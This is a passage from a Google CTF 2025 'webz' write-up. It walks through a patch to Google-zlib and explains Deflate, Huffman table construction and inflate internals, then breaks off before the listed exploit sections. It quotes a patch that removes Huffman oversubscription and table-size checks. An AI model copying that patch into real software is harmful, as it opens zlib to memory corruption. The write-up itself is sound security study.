1. Overview 2. Background 2-1. google-zlib-Increase-Huffman-Table-Size.patch 2-2. Deflate Algorithm 2-2-1. LZ77 2-2-2. Huffman Coding 3. Code Analysis 3-1. Inflate 3-2. Huffman Table 3-3. Decode 4. Vulnerability 4-1. Unintialized Huffman Code Table 4-2. Exploiting inflate_fast 4-2-1. Integer Overflow (Unexploitable) 4-2-2. PoC 4-2-3. Stream Overflow (Exploitable) 4-2-4. PoC 5. Exploit 1. Overview webz is a zlib exploitation challenge from Google CTF 2025. The Google-zlib implementation provided in the challenge is not upstream; it’s a version with an arbitrary patch applied. Whereas typical open‑source exploit challenges ship a patch that clearly introduces a vulnerability, webz ’s Google-zlib patch appears—at first glance—to be a normal optimization. In practice, the vulnerability in this Google-zlib can be found quickly via fuzzing. However, in this write‑up we’ll derive the precise root cause through source analysis. 2. Background The Google-zlib codebase isn’t large, but it is quite tricky. Because it implements compression algorithms, manipulates data at the bit level, and contains optimizations that sacrifice readability, analysis can be difficult. int ret = inflateInit2 ( & webz_state . infstream , - 15 ) ; webz_state . infstream . msg = webz_state . ok_status ; if ( ret != Z_OK ) { printf ( "Error: inflateInit failed: %d " , ret ) ; return ; } ret = inflate ( & webz_state . infstream , Z_NO_FLUSH ) ; if ( ret != Z_STREAM_END ) { printf ( "Error: inflate failed: %d " , ret ) ; inflateEnd ( & webz_state . infstream ) ; return ; } inflateEnd ( & webz_state . infstream ) ; / \ * windowBits can also be - 8. . - 15 for raw deflate . In this case , - windowBits determines the window size . deflate ( ) will then generate raw deflate data with no zlib header or trailer , and will not compute a check value . \ * / First, let’s look at the provided webz.c . It’s simply a wrapper around Google-zlib. It receives raw Deflate-compressed data from the user and decompresses it using Google-zlib’s inflate . Therefore, we must identify vulnerabilities in the code that implements inflate : inflate.c , inftrees.c , and inffast.c . inflate.c The core of the inflate implementation. The inflate function is a virtual finite-state machine, treating the given compressed data like opcodes for a virtual machine. As we’ll examine later, it processes compressed data in blocks. The core of the implementation. The function is a virtual finite-state machine, treating the given compressed data like opcodes for a virtual machine. As we’ll examine later, it processes compressed data in blocks. inftrees.c One of the compression techniques used in Deflate is Huffman coding. To decode Huffman-coded data in the inflate implementation, a Huffman table must be constructed; inftrees.c contains that Huffman table construction code. One of the compression techniques used in is Huffman coding. To decode Huffman-coded data in the implementation, a Huffman table must be constructed; contains that Huffman table construction code. inffast.c inffast.c contains inflate_fast , a high-speed implementation of inflate decoding. Under certain conditions, inflate calls inflate_fast to decode data. 2-1. google-zlib-Increase-Huffman-Table-Size.patch From 2 c282408771115b3cf80eeb9572927b796ddea79 Mon Sep 17 00 : 00 : 00 2001 From : Brendon Tiszka < tiszka@google . com > Date : Wed , 21 May 2025 15 : 11 : 52 + 0000 Subject : [ PATCH ] [ google - zlib ] Increase Huffman Table Size The basic idea is to use a bigger root & secondary table for both dists and lens , allowing us to avoid oversubscription chekcs . -- - inftrees . c | 18 -- -- -- -- -- -- -- -- -- inftrees . h | 18 ++ ++ + -- -- -- -- -- -- - 2 files changed , 5 insertions ( + ) , 31 deletions ( - ) diff -- git a / inftrees . c b / inftrees . c index a127e6b . .7 a8dd2e 100644 -- - a / inftrees . c ++ + b / inftrees . c @@ - 122 , 16 + 122 , 6 @@ int ZLIB_INTERNAL inflate_table ( codetype type , unsigned short FAR * lens , if ( count [ min ] != 0 ) break ; if ( root < min ) root = min ; - - left = 1 ; - for ( len = 1 ; len <= MAXBITS ; len ++ ) { - left <<= 1 ; - left -= count [ len ] ; - if ( left < 0 ) return - 1 ; - } - if ( left > 0 && ( type == CODES || max != 1 ) ) - return - 1 ; - offs [ 1 ] = 0 ; for ( len = 1 ; len < MAXBITS ; len ++ ) @@ - 200 , 11 + 190 , 6 @@ int ZLIB_INTERNAL inflate_table ( codetype type , unsigned short FAR * lens , used = 1U << root ; mask = used - 1 ; - - if ( ( type == LENS && used > ENOUGH_LENS ) || - ( type == DISTS && used > ENOUGH_DISTS ) ) - return 1 ; - for ( ; ; ) { @@ - 270 , 9 + 255 , 6 @@ int ZLIB_INTERNAL inflate_table ( codetype type , unsigned short FAR * lens , used += 1U << curr ; - if ( ( type == LENS && used > ENOUGH_LENS ) || - ( type == DISTS && used > ENOUGH_DISTS ) ) - return 1 ; low = huff & mask ; diff -- git a / inftrees . h b / inftrees . h index 396f 74 b . .42 c2c44 100644 -- - a / inftrees . h ++ + b / inftrees . h @@ - 35 , 19 + 35 , 11 @@ typedef struct { 01000000 - invalid code * / - - #define ENOUGH_LENS 852 - #define ENOUGH_DISTS 592 + + #define ENOUGH_LENS ( 1 << 15 ) + #define ENOUGH_DISTS ( 1 << 15 ) # define ENOUGH (ENOUGH_LENS+ENOUGH_DISTS) -- 2.50 .0 . rc0 . 642. g800a2b2222 - goog The Google-zlib source shipped with the challenge contains a 0001-google-zlib-Increase-Huffman-Table-Size.patch . From that patch we can see the code has been modified as above. The patch removes some checks in inftrees.c and greatly increases the values of ENOUGH_LENS and ENOUGH_DISTS . From the comments, the patch increases the sizes of Huffman tables and removes related checks to achieve a memory/speed tradeoff optimization. At this point we don’t yet know exactly what issues this introduces, but it’s clear the vulnerability will be related to Huffman tables and Huffman coding. 2-2. Deflate Algorithm Before analyzing the code, let’s review the Deflate compression algorithm. Deflate uses Huffman coding and the LZ77 algorithm to compress data. 2-2-1. LZ77 The principle of the LZ77 algorithm is very simple: repeated data is replaced by (length, distance) pairs. ABCDEEABCDFF -> ABCDEE(4,6)FF The length is how many bytes to copy, and the distance is how far back from the current position the source data lies. 2-2-1. Huffman Coding Huffman coding is a bit more involved. The basic idea is to replace original data with compressed bit sequences. While the minimum unit of data is typically a byte (8 bits), replacing values with shorter bit sequences reduces size. ABABAAAABBBB (12 Byte, 96bit) -> 010100001111 ( 1.5 Byte, 12bit) In this example there are only two symbols, A and B, which can be encoded with 1-bit Huffman codes (0 and 1). If there are more than two symbols, you obviously cannot compress them all with 1-bit codes. A -> 00 B -> 01 C -> 10 D -> 110 E -> 111 ABCDABCEABC -> 000110110000110111 As shown, Huffman codes depend on the data being compressed, so to decode the compressed data, you need a table mapping {Huffman code : actual value}. A Huffman code cannot be the prefix of another Huffman code. For example, if 111 is a code, then 11 cannot be a code; since codes have variable length, a prefix collision like 1110 would be ambiguous—unclear whether it’s 111 + 0 or 11 + 10. Also, the minimum and maximum code lengths vary depending on the number of distinct data values. Huffman coding assigns shorter codes (e.g., 2 bits) to high-frequency values (A, B, C) and longer codes (e.g., 3 bits) to low-frequency values (D, E) to compress effectively. Additionally, consider this: if Deflate generates efficient Huffman codes tailored to the input, then the decoder needs the corresponding Huffman table to decode. Therefore, Deflate uses either fixed Huffman tables or dynamic Huffman tables depending on the situation. Fixed Huffman table Predefined in Deflate/Inflate. It doesn’t always give the most efficient compression for the data, but you don’t need to include a Huffman table in the final compressed stream. Predefined in Deflate/Inflate. It doesn’t always give the most efficient compression for the data, but you don’t need to include a Huffman table in the final compressed stream. Dynamic Huffman table Performs optimal Huffman coding for the given data, and includes in the final compressed data the Huffman table necessary to decode it. Let’s elaborate on “including the Huffman table in the final compressed data.” In the standard implementation, the Huffman table can be represented using only code lengths. A -> 00 B -> 01 C -> 10 D -> 110 E -> 111 Rather than storing the entire codes as above, you can store just the code lengths: A -> 2 B -> 2 C -> 2 D -> 3 E -> 3 Since actual Huffman codes have lengths in the range 3–15 bits, storing only lengths reduces the size of the embedded Huffman tables. Separately from using code lengths to compress the Huffman table, Google‑zlib compresses the lengths themselves again using Huffman coding. We’ll discuss this in more detail during the source analysis below. huffman_table['A'] = 2 huffman_table['B'] = 2 huffman_table['C'] = 2 huffman_table['D'] = 3 huffman_table['E'] = 3 This works for a simple reason. A Huffman table is an array indexed by the original symbol. Assign the first 2-bit code 00 to A; then B gets 01, C gets 10, and so on. Using only lengths and order, all codes are recoverable. In other words, if Deflate assigns codes in order, Inflate can reconstruct them from just the lengths. Deflate uses Huffman coding not only for literal values (0–255), but also for the LZ77 (length, distance) pairs. 3. Code Analysis 3-1. Inflate int ZEXPORT inflate ( z_streamp strm , int flush ) { struct inflate_state FAR * state ; z_const unsigned char FAR * next ; unsigned char FAR * put ; unsigned have , left ; unsigned long hold ; unsigned bits ; unsigned in , out ; unsigned copy ; unsigned char FAR * from ; code here ; code last ; unsigned len ; int ret ; # ifdef GUNZIP unsigned char hbuf [ 4 ] ; # endif static const unsigned short order [ 19 ] = { 16 , 17 , 18 , 0 , 8 , 7 , 9 , 6 , 10 , 5 , 11 , 4 , 12 , 3 , 13 , 2 , 14 , 1 , 15 } ; if ( inflateStateCheck ( strm ) || strm -> next_out == Z_NULL || ( strm -> next_in == Z_NULL && strm -> avail_in != 0 ) ) return Z_STREAM_ERROR ; state = ( struct inflate_state FAR * ) strm -> state ; if ( state -> mode == TYPE ) state -> mode = TYPEDO ; LOAD ( ) ; in = have ; out = left ; ret = Z_OK ; for ( ; ; ) switch ( state -> mode ) { case HEAD : if ( state -> wrap == 0 ) { state -> mode = TYPEDO ; break ; } . . . inflate is a virtual finite-state machine. It treats the compressed data stream ( strm ) as opcodes and executes like a VM. Since inflateInit2_ sets state->mode = HEAD , it transitions to state->mode = TYPEDO , and then hits the case TYPEDO . # define LOAD() \ do { \ put = strm->next_out; \ left = strm->avail_out; \ next = strm->next_in; \ have = strm->avail_in; \ hold = state->hold; \ bits = state->bits; \ } while (0) # define RESTORE() \ do { \ strm->next_out = put; \ strm->avail_out = left; \ strm->next_in = next; \ strm->avail_in = have; \ state->hold = hold; \ state->bits = bits; \ } while (0) strm->next_out : end pointer of the decompressed output buffer that’s been filled so far : end pointer of the decompressed output buffer that’s been filled so far strm->avail_out : remaining size of the decompression buffer : remaining size of the decompression buffer strm->next_in : end pointer of the processed input data : end pointer of the processed input data strm->avail_in : remaining number of input bytes to process : remaining number of input bytes to process state->hold : buffer used for bit operations : buffer used for bit operations state->bits : current bit length stored in state->hold Before the main loop, let’s note some macros and variables used by Inflate. Members of the strm structure don’t benefit from register optimization, so these macros copy them into locals for faster operations. # define PULLBYTE() \ do { \ if (have == 0) goto inf_leave; \ have--; \ hold += (unsigned long)(*next++) << bits; \ bits += 8; \ } while (0) # define NEEDBITS(n) \ do { \ while (bits < (unsigned)(n)) \ PULLBYTE(); \ } while (0) # define BITS(n) \ ((unsigned)hold & ((1U << (n)) - 1)) # define DROPBITS(n) \ do { \ hold >>= (n); \ bits -= (unsigned)(n); \ } while (0) Unlike byte-oriented data, compressed data is processed at bit granularity because of packing and Huffman coding. The Inflate implementation uses macros like these to fill a bit buffer ( hold ) and manipulate it bitwise. The basic logic is: use NEEDBITS to pull bits from strm->next_in ( next ) into state->hold ( hold ), decreasing strm->avail_in ( have ) accordingly. Then extract as many bits as needed with BITS , and drop consumed bits with DROPBITS . Using this bit-level handling, the code decodes the compressed data and appends the decoded bytes to strm->next_out ( put ), decreasing strm->avail_out ( left ) by the number of bytes written. case TYPEDO : if ( state -> last ) { BYTEBITS ( ) ; state -> mode = CHECK ; break ; } NEEDBITS ( 3 ) ; state -> last = BITS ( 1 ) ; DROPBITS ( 1 ) ; switch ( BITS ( 2 ) ) { case 0 : Tracev ( ( stderr , "inflate: stored block%s " , state -> last ? " (last)" : "" ) ) ; state -> mode = STORED ; break ; case 1 : fixedtables ( state ) ; Tracev ( ( stderr , "inflate: fixed codes block%s " , state -> last ? " (last)" : "" ) ) ; state -> mode = LEN_ ; if ( flush == Z_TREES ) { DROPBITS ( 2 ) ; goto inf_leave ; } break ; case 2 : Tracev ( ( stderr , "inflate: dynamic codes block%s " , state -> last ? " (last)" : "" ) ) ; state -> mode = TABLE ; break ; case 3 : strm -> msg = ( z_const char * ) "invalid block type" ; state -> mode = BAD ; } DROPBITS ( 2 ) ; break ; Back in inflate , compressed data is processed in blocks, starting at case TYPEDO . After ensuring at least 3 bits in the buffer ( NEEDBITS(3) ), it reads 1 bit with BITS(1) to set state->last , which indicates whether this block is the last one. It then drops that bit and uses the next two bits to select the block type. stored block (0) : a block of uncompressed data. When state->mode = STORED , it will directly copy from strm->next_in to strm->next_out . : a block of uncompressed data. When , it will directly copy from to . fixed codes block (1) : data compressed with the fixed Huffman table. fixedtables(state) builds the fixed table, then state->mode = LEN_ moves to the Huffman decoding path. : data compressed with the fixed Huffman table. builds the fixed table, then moves to the Huffman decoding path. dynamic codes block (2): data compressed with a dynamic Huffman table. state->mode = TABLE reads dynamic table info from the compressed stream, constructs the dynamic Huffman table, then proceeds to decode. Blocks have the following forms: [0(stored_bock) + state->last + length to copy + uncompressed bytes to copy] [1(fixed codes block) + state->last + compressed data (Huffman codes) + Huffman code for End of Block] [2(Dynamic codes block) + state->last + dynamic table info (Code Huffman table + compressed Literal/Length and Distance Huffman tables) + compressed data (Huffman codes) + Huffman code for End of Block ] The compressed stream consists of one or more blocks, and inflate decodes each according to the code above. case TABLE : NEEDBITS ( 14 ) ; state -> nlen = BITS ( 5 ) + 257 ; DROPBITS ( 5 ) ; state -> ndist = BITS ( 5 ) + 1 ; DROPBITS ( 5 ) ; state -> ncode = BITS ( 4 ) + 4 ; DROPBITS ( 4 ) ; # ifndef PKZIP_BUG_WORKAROUND if ( state -> nlen > 286 || state -> ndist > 30 ) { strm -> msg = ( z_const char * ) "too many length or distance symbols" ; state -> mode = BAD ; break ; } # endif Tracev ( ( stderr , "inflate: table sizes ok " ) ) ; state -> have = 0 ; state -> mode = LENLENS ; Let’s look at how a dynamic Huffman table is built. As noted earlier, a dynamic codes block includes a Code Huffman table, and compressed Literal/Length and Distance tables. The code above reads the lengths for those three tables. The Literal/Length table contains codes for literal bytes (A, B, …) and for LZ77 lengths; the Distance table holds codes for LZ77 distances. Using these two tables, the decoder performs Huffman and LZ77 decoding. So what is the Code Huffman table? The Literal/Length and Distance tables are stored compressed in the stream—again via Huffman coding. The Code Huffman table is the dynamic Huffman table used to decode the Huffman tables (lengths) themselves. case LENLENS : while ( state -> have < state -> ncode ) { NEEDBITS ( 3 ) ; state -> lens [ order [ state -> have ++ ] ] = ( unsigned short ) BITS ( 3 ) ; DROPBITS ( 3 ) ; } while ( state -> have < 19 ) state -> lens [ order [ state -> have ++ ] ] = 0 ; state -> next = state -> codes ; state -> lencode = state -> distcode = ( const code FAR * ) ( state -> next ) ; state -> lenbits = 7 ; ret = inflate_table ( CODES , state -> lens , 19 , & ( state -> next ) , & ( state -> lenbits ) , state -> work ) ; if ( ret ) { strm -> msg = ( z_const char * ) "invalid code lengths set" ; state -> mode = BAD ; break ; } Tracev ( ( stderr , "inflate: code lengths ok " ) ) ; state -> have = 0 ; state -> mode = CODELENS ; First, we read the Code Huffman table lengths. We loop state->ncode times and read 3 bits each time into state->lens . These 3-bit values are code lengths—the Huffman table is represented by lengths, not the full bit patterns, as discussed earlier. Thus, state->lens records the Code Huffman table’s code lengths in the order permutation. static const unsigned short order [ 19 ] = { 16 , 17 , 18 , 0 , 8 , 7 , 9 , 6 , 10 , 5 , 11 , 4 , 12 , 3 , 13 , 2 , 14 , 1 , 15 } ; Here, order reduces the size of the encoded Code Huffman table. The Code table decodes original values 0–18. Storing lengths for all 19 values would be inefficient. Typically, codes are used more frequently in the same order as order . If we stored lengths in plain 0–18 order, we’d need to write zeros for many unused values (e.g., 0–15) before the frequently used 16, 17, 18. By ordering them as above, we can store just the lengths for the frequently used codes and leave the rest implicit. The code reflects this: it reads state->ncode lengths, and sets the remaining entries to zero. We then set state->next to point into state->codes , and call inflate_table to build the Huffman table. The resulting table is written at state->next ( state->lencode ). We’ll cover inflate_table shortly. For now, note the parameters: CODES (build the Code table), state->lens (length array), 19 (number of symbols, 0–18), &(state->next) (output pointer for the constructed table), &(state->lenbits) (table index bit width—initially 7, but may be adjusted by inflate_table ), and state->work (a temporary array for sorting). case CODELENS : while ( state -> have < state -> nlen + state -> ndist ) { for ( ; ; ) { here = state -> lencode [ BITS ( state -> lenbits ) ] ; if ( ( unsigned ) ( here . bits ) <= bits ) break ; PULLBYTE ( ) ; } if ( here . val < 16 ) { DROPBITS ( here . bits ) ; state -> lens [ state -> have ++ ] = here . val ; } else { if ( here . val == 16 ) { NEEDBITS ( here . bits + 2 ) ; DROPBITS ( here . bits ) ; if ( state -> have == 0 ) { strm -> msg = ( z_const char * ) "invalid bit length repeat" ; state -> mode = BAD ; break ; } len = state -> lens [ state -> have - 1 ] ; copy = 3 + BITS ( 2 ) ; DROPBITS ( 2 ) ; } else if ( here . val == 17 ) { NEEDBITS ( here . bits + 3 ) ; DROPBITS ( here . bits ) ; len = 0 ; copy = 3 + BITS ( 3 ) ; DROPBITS ( 3 ) ; } else { NEEDBITS ( here . bits + 7 ) ; DROPBITS ( here . bits ) ; len = 0 ; copy = 11 + BITS ( 7 ) ; DROPBITS ( 7 ) ; } if ( state -> have + copy > state -> nlen + state -> ndist ) { strm -> msg = ( z_const char * ) "invalid bit length repeat" ; state -> mode = BAD ; break ; } while ( copy -- ) state -> lens [ state -> have ++ ] = ( unsigned short ) len ; } } if ( state -> mode == BAD ) break ; if ( state -> lens [ 256 ] == 0 ) { strm -> msg = ( z_const char * ) "invalid code -- missing end-of-block" ; state -> mode = BAD ; break ; } state -> next = state -> codes ; state -> lencode = ( const code FAR * ) ( state -> next ) ; state -> lenbits = 9 ; ret = inflate_table ( LENS , state -> lens , state -> nlen , & ( state -> next ) , & ( state -> lenbits ) , state -> work ) ; if ( ret ) { strm -> msg = ( z_const char * ) "invalid literal/lengths set" ; state -> mode = BAD ; break ; } state -> distcode = ( const code FAR * ) ( state -> next ) ; state -> distbits = 6 ; ret = inflate_table ( DISTS , state -> lens + state -> nlen , state -> ndist , & ( state -> next ) , & ( state -> distbits ) , state -> work ) ; if ( ret ) { strm -> msg = ( z_const char * ) "invalid distances set" ; state -> mode = BAD ; break ; } Tracev ( ( stderr , "inflate: codes ok " ) ) ; state -> mode = LEN_ ; if ( flush == Z_TREES ) goto inf_leave ; Once the Code table is built, we decode the compressed lengths of the Literal/Length and Distance tables. We read state->lenbits bits and use the Code table state->lencode to decode entries, retrieving a code struct from the table. Values 0–18 decoded via the Code table are not literal decoded bytes. Based on the code, they behave as follows: 0–15: literal code lengths 0–15 directly 16: repeat previous length 3–6 times 17: repeat length 0, 3–10 times 18: repeat length 0, 11–138 times Here “original value” refers to the value decoded by Huffman coding, not necessarily the final decompressed byte. Some values (0–15) correspond to actual lengths, others (16–18) are special symbols. code here ; We’ll explain this struct in the Huffman table construction section. Depending on its members, various actions occur to ultimately decode each value. As before, we call inflate_table to build the final state->lencode and state->distcode tables for Literal/Length and Distance respectively. The Code table is no longer needed, so overwriting state->lencode is fine. case LEN : if ( have >= 6 && left >= 258 ) { RESTORE ( ) ; inflate_fast ( strm , out ) ; LOAD ( ) ; if ( state -> mode == TYPE ) state -> back = - 1 ; break ; } state -> back = 0 ; for ( ; ; ) { here = state -> lencode [ BITS ( state -> lenbits ) ] ; if ( ( unsigned ) ( here . bits ) <= bits ) break ; PULLBYTE ( ) ; } if ( here . op && ( here . op & 0xf0 ) == 0 ) { last = here ; for ( ; ; ) { here = state -> lencode [ last . val + ( BITS ( last . bits + last . op ) >> last . bits ) ] ; if ( ( unsigned ) ( last . bits + here . bits ) <= bits ) break ; PULLBYTE ( ) ; } DROPBITS ( last . bits ) ; state -> back += last . bits ; } DROPBITS ( here . bits ) ; state -> back += here . bits ; state -> length = ( unsigned ) here . val ; if ( ( int ) ( here . op ) == 0 ) { Tracevv ( ( stderr , here . val >= 0x20 && here . val < 0x7f ? "inflate: literal '%c' " : "inflate: literal 0x%02x " , here . val ) ) ; state -> mode = LIT ; break ; } if ( here . op & 32 ) { Tracevv ( ( stderr , "inflate: end of block " ) ) ; state -> back = - 1 ; state -> mode = TYPE ; break ; } if ( here . op & 64 ) { strm -> msg = ( z_const char * ) "invalid literal/length code" ; state -> mode = BAD ; break ; } state -> extra = ( unsigned ) ( here . op ) & 15 ; state -> mode = LENEXT ; We now enter the decoding process. Again, we fetch a code from the table and take actions based on its fields to decode the original value. case LIT : if ( left == 0 ) goto inf_leave ; * put ++ = ( unsigned char ) ( state -> length ) ; left -- ; state -> mode = LEN ; break ; A quick check shows that when here.op == 0 , we switch to state->mode = LIT and append here.val (the literal byte) to strm->next_out ( put ). Also, here.bits is the number of bits consumed to decode that symbol; i.e., it’s the code length, and the decoder uses DROPBITS(here.bits) to consume bits. This is standard Huffman decoding. But there are other decoding forms depending on here.op —we’ll explain this in the table construction section. case LEN : if ( have >= 6 && left >= 258 ) { RESTORE ( ) ; inflate_fast ( strm , out ) ; LOAD ( ) ; if ( state -> mode == TYPE ) state -> back = - 1 ; break ; } Back to the code snippet above. If have and left are large enough, inflate calls inflate_fast for high-speed decoding. The in-function Huffman decoding is slower because it transitions through VM-like states; inflate_fast operates with full buffers and fewer checks. Therefore, inflate_fast requires sufficiently large input/output buffers to be safe. 3-2. Huffman Table int ZLIB_INTERNAL inflate_table ( codetype type , unsigned short FAR * lens , unsigned codes , code FAR * FAR * table , unsigned FAR * bits , unsigned short FAR * work ) { Let’s revisit inflate_table ’s parameters: codetype type : table type (Code, Literal/Length, Distance) unsigned short FAR *lens : array of code lengths : array of code lengths unsigned codes : number of symbols (table entries) : number of symbols (table entries) code FAR * FAR *table : output pointer to the constructed table : output pointer to the constructed table unsigned FAR *bits : pointer to the number of index bits for the table (may be adjusted) : pointer to the number of index bits for the table (may be adjusted) unsigned short FAR *work : scratch array for sorting, etc. typedef struct { unsigned char op ; unsigned char bits ; unsigned short val ; } code ; Now, the code struct. The Huffman table is an array of code structs; op determines how to decode, bits is the code length, and val holds the value. As the comment indicates, these fields can play different roles depending on op . for ( len = 0 ; len <= MAXBITS ; len ++ ) count [ len ] = 0 ; for ( sym = 0 ; sym < codes ; sym ++ ) count [ lens [ sym ] ] ++ ; root = * bits ; for ( max = MAXBITS ; max >= 1 ; max -- ) if ( count [ max ] != 0 ) break ; if ( root > max ) root = max ; if ( max == 0 ) { here . op = ( unsigned char ) 64 ; here . bits = ( unsigned char ) 1 ; here . val = ( unsigned short ) 0 ; * ( * table ) ++ = here ; * ( * table ) ++ = here ; * bits = 1 ; return 0 ; } for ( min = 1 ; min < max ; min ++ ) if ( count [ min ] != 0 ) break ; if ( root < min ) root = min ; offs [ 1 ] = 0 ; for ( len = 1 ; len < MAXBITS ; len ++ ) offs [ len + 1 ] = offs [ len ] + count [ len ] ; for ( sym = 0 ; sym < codes ; sym ++ ) if ( lens [ sym ] != 0 ) work [ offs [ lens [ sym ] ] ++ ] = ( unsigned short ) sym ; Let’s step through table construction. First we count, for each code length, how many symbols use that length. We then determine the minimum and maximum code lengths from count and set root , the table’s index bit width. root initially comes from the bits argument but may be adjusted based on min/max. That’s why bits is a pointer: any adjustments made in inflate_table must also be visible to the caller. The Huffman table is a simple 1D array, indexed by bits: table[huffman_code] = decoded_value (actually a code struct to decode it) . Thus, root is really the number of index bits—i.e., the size of the primary table. If root=7 , the table has entries up to table[127(0b1111111)] . If root > max , set root = max to avoid wasting space. If root < min , set root = min ; otherwise you couldn’t store any codes at all. But if root = min , how do we store codes longer than root ? Using multi-level tables. As we’ve seen, the op field can indicate a second-level lookup. For example, suppose there are ten 8‑bit codes and one 9‑bit code. You don’t want to double the table size (from 256 to 512 entries) just for one symbol. So the primary table has 256 entries; all 8‑bit codes and the prefixes of any longer codes are stored there. For longer codes, entries in the primary table point to sub-tables that hold the remaining bits. We’ll see the exact mechanics below. Once root is decided, we build the offs array to sort symbols by code length and symbol order into work . The work array is needed to reconstruct the full Huffman codes from the lengths. A -> 2 (00) B -> 3 (110) C -> 2 (01) D -> 2 (10) E -> 3 (111) To reconstruct codes from lengths, group symbols with the same length and assign codes in order: A -> 2 (00) C -> 2 (01) D -> 2 (10) B -> 3 (110) E -> 3 (111) work is the array that encodes this ordering; the build loop will walk work to assign codes. switch ( type ) { case CODES : base = extra = work ; match = 20 ; break ; case LENS : base = lbase ; extra = lext ; match = 257 ; break ; default : base = dbase ; extra = dext ; match = 0 ; } Depending on type , we set match , base , and extra . These support the Base/Extra decoding mode described below. Dynamic Huffman table lengths in the stream are usually stored by position (index), since that index is the original value—e.g., index 65 corresponds to ‘A’. This is efficient for literals (0–255). But what about LZ77 length/distance values? Deflate specifies length range 3–258 and distance range 1–32,768, making a direct per‑value table impractical. So lengths and distances use Base/Extra coding. match indicates where Base/Extra decoding begins. For Literal/Length, 0–255 are literals and 256 is End of Block; from 257 upward (LZ77 lengths), Base/Extra applies—so match=257 . The Code table doesn’t use Base/Extra at all, so match=20 (greater than the largest code index). Distance uses Base/Extra for all symbols, so match=0 . base and extra select the arrays used for Base/Extra depending on whether we’re building the length or distance table. huff = 0 ; sym = 0 ; len = min ; next = * table ; curr = root ; drop = 0 ; low = ( unsigned ) ( - 1 ) ; used = 1U << root ; mask = used - 1 ; for ( ; ; ) { here . bits = ( unsigned char ) ( len - drop ) ; if ( work [ sym ] + 1U < match ) { here . op = ( unsigned char ) 0 ; here . val = work [ sym ] ; } else if ( work [ sym ] >= match ) { here . op = ( unsigned char ) ( extra [ work [ sym ] - match ] ) ; here . val = base [ work [ sym ] - match ] ; } else { here . op = ( unsigned char ) ( 32 + 64 ) ; here . val = 0 ; } This is the main construction loop. We iterate through work , creating a code entry for each symbol. If symbol+1 < match , it’s a normal entry: op=0 , val=symbol . As we saw in case LIT: , decoding such an entry emits val . Recall: “original value” here means the Huffman-decoded value. In the simple case above, it’s the final literal; with Base/Extra, it’s a special symbol that needs further interpretation. If symbol >= match , we create an entry using the Base/Extra scheme: op holds the number of extra bits, val holds the base. state -> length = ( unsigned ) here . val ; if ( ( int ) ( here . op ) == 0 ) { Tracevv ( ( stderr , here . val >= 0x20 && here . val < 0x7f ? "inflate: literal '%c' " : "inflate: literal 0x%02x " , here . val ) ) ; state -> mode = LIT ; break ; } if ( here . op & 32 ) { Tracevv ( ( stderr , "inflate: end of block " ) ) ; state -> back = - 1 ; state -> mode = TYPE ; break ; } if ( here . op & 64 ) { strm -> msg = ( z_const char * ) "invalid literal/length code" ; state -> mode = BAD ; break ; } state -> extra = ( unsigned ) ( here . op ) & 15 ; state -> mode = LENEXT ; case LENEXT : if ( state -> extra ) { NEEDBITS ( state -> extra ) ; state -> length += BITS ( state -> extra ) ; DROPBITS ( state -> extra ) ; state -> back += state -> extra ; } Tracevv ( ( stderr , "inflate: length %u " , state -> length ) ) ; state -> was = state -> length ; state -> mode = DIST ; To understand Base/Extra, look at the length-decoding routine in inflate . First, state->length = here.val (the base). Then, based on op , if it’s not a literal/end/invalid, we go to length decoding. op & 15 extracts the number of extra bits. We then read that many bits and add them to the base to get the final length. The op & 15 is necessary because the lext / dext arrays encode flags along with the count of extra bits. static const unsigned short lbase [ 31 ] = { 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 13 , 15 , 17 , 19 , 23 , 27 , 31 , 35 , 43 , 51 , 59 , 67 , 83 , 99 , 115 , 131 , 163 , 195 , 227 , 258 , 0 , 0 } ; static const unsigned short lext [ 31 ] = { 16 , 16 , 16 , 16 , 16 , 16 , 16 , 16 , 17 , 17 , 17 , 17 , 18 , 18 , 18 , 18 , 19 , 19 , 19 , 19 , 20 , 20 , 20 , 20 , 21 , 21 , 21 , 21 , 16 , 73 , 200 } ; static const unsigned short dbase [ 32 ] = { 1 , 2 , 3 , 4 , 5 , 7 , 9 , 13 , 17 , 25 , 33 , 49 , 65 , 97 , 129 , 193 , 257 , 385 , 513 , 769 , 1025 , 1537 , 2049 , 3073 , 4097 , 6145 , 8193 , 12289 , 16385 , 24577 , 0 , 0 } ; static const unsigned short dext [ 32 ] = { 16 , 16 , 16 , 16 , 17 , 17 , 18 , 18 , 19 , 19 , 20 , 20 , 21 , 21 , 22 , 22 , 23 , 23 , 24 , 24 , 25 , 25 , 26 , 26 , 27 , 27 , 28 , 28 , 29 , 29 , 64 , 64 } ; For example, suppose we want to decode length 20. Its code length entry would be at huffman_table[269] . here.op = extra - match](257) = extra[12] = lext[12] = 18 here.val = base - match(257)] = base[12] = lbase[12] = 19 The length routine then computes state->length = 19 + BITS(18 & 15 (2)) . If the stream provides 01 as the extra bits, we decode 19 + 1 = 20 . The key idea of Base/Extra: values like 20 (and the range 19 + 0b00 ~ 0b11 ) are all represented by the same Huffman symbol (index 269); the exact value is determined by reading the extra bits. The table groups ranges by base and uses extra bits to resolve within the range. incr = 1U << ( len - drop ) ; fill = 1U << curr ; min = fill ; do { fill -= incr ; next [ ( huff >> drop ) + fill ] = here ; } while ( fill != 0 ) ; incr = 1U << ( len - 1 ) ; while ( huff & incr ) incr >>= 1 ; if ( incr != 0 ) { huff &= incr - 1 ; huff += incr ; } else huff = 0 ; sym ++ ; if ( -- ( count [ len ] ) == 0 ) { if ( len == max ) break ; len = lens [ work [ sym ] ] ; } After creating a code entry, we write it into the table at multiple positions. drop is used for sub-tables (multi-level); it’s 0 in the primary table. The loop writes here into next[huff + (0, incr, incr*2, …, fill-incr)] . Before explaining why, let’s note something important: A -> 00 B -> 01 C -> 10 D -> 110 E -> 111 If we naively stored: next[0(0b00)] = here(op=0, bits=2, val='A') next[1(0b01)] = here(op=0, bits=2, val='B') next[2(0b10)] = here(op=0, bits=2, val='C') next[6(0b110)] = here(op=0, bits=3, val='D') next[7(0b111)] = here(op=0, bits=3, val='E') that looks reasonable—but it’s wrong. Consider compressing “CB”: 0b10(C) << 0 + 0b01(B) << 2 = 0b0110 Bits are packed least significant bit first; simply concatenating as 0b1001 would make bitwise decoding impossible. The compressed bits for CB (0b0110) match those for D (0b110). Even though the code set is prefix-free when read left-to-right, Deflate uses a bitstream where the trailing bits act as prefixes due to LSB-first packing. To handle this, we reverse the bit order when building indices: next[0(0b00)] = here(op=0, bits=2, val='A') next[2(0b10)] = here(op=0, bits=2, val='B') next[1(0b01)] = 